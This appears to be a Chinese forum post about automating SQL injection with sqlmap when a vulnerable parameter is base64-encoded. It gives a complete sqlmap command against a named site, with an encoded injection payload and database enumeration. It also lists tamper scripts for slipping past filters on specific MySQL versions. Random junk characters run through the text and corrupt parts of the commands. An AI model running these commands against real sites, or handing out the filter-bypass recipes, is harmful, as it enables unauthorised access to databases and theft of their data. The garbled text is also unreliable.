WVS扫某站就出来一个SQL Injection,参数还是base64编码的,手工注入麻烦一步,用sqlmap怎么自动注射呢?
4 F0 H; {3 r [3 M {/ G" E( `
/ |. p) X: G, q! d# xsqlmap的tamper里有个base64encode.py
5 f/ K+ O/ n$ O- T# \
# P, S# T. `. J3 H' B使用如下
$ f6 o6 ]/ a! R7 \1 E! |5 v; |. i9 b, R5 D: w- L
sqlmap -u http://ha.cker.in/index.php?tel=LTEnIG9yICc4OCc9Jzg5 --tamper base64encode.py –dbs+ ]2 M4 J5 T1 c' s ?( b' u
/ N9 e# M5 P1 m# f! H4 u0 \7 M' w5 f. g. Q5 f
sqlmap拥有很多功能强力的插件,插件的使用方法: -- tamper “插件名称”
1 N* ? _; P4 h9 H8 [
5 p# i; t. N6 R7 u$ X其中常用到的bypass脚本绕过SQLMAP主要两个脚本: }* ]! e3 p2 j( z% K+ F8 q# ~8 {
, m7 p' b1 @- n3 d8 ]' V
space2hash.py ,对于MYSQL数据库 4.0, 5.0注入7 W" K! C0 g' q' m& ^8 @
space2morehash.py ,对于MYSQL数据库 >= 5.1.13 和 MySQL 5.1.41 注入
4 a$ G9 X& C0 R3 Y0 q: c1 R首先确定目标数据库版本,然后选择相应的脚本。6 M; p5 s6 |0 |# u: z$ o
-v 3 --batch --tamper "space2hash.py"
( h# L9 @& G% ]; m; l" J& I2 N0 R6 a- u4 X9 d7 t; j$ h8 i- H
还有其他一些插件:
" d7 y# S8 S& m6 v$ m0 x' Aencodes编码 ——charencode.py
5 k; E2 I% l- `2 M; Ibase64编码 —— base64encode.py6 {7 |! K6 E! D+ v3 U- E
替换空格和关键字 —— halfversionedmorekeywords.py
: u2 z9 U5 P0 |; R |
7 \5 w& V" K p. X W$ [# ~+ m! H+ r& I2 P& e
) {; C+ u5 e0 B$ z9 Z4 o- Q9 O- g) E
6 O/ @6 W* V1 p* F+ @ |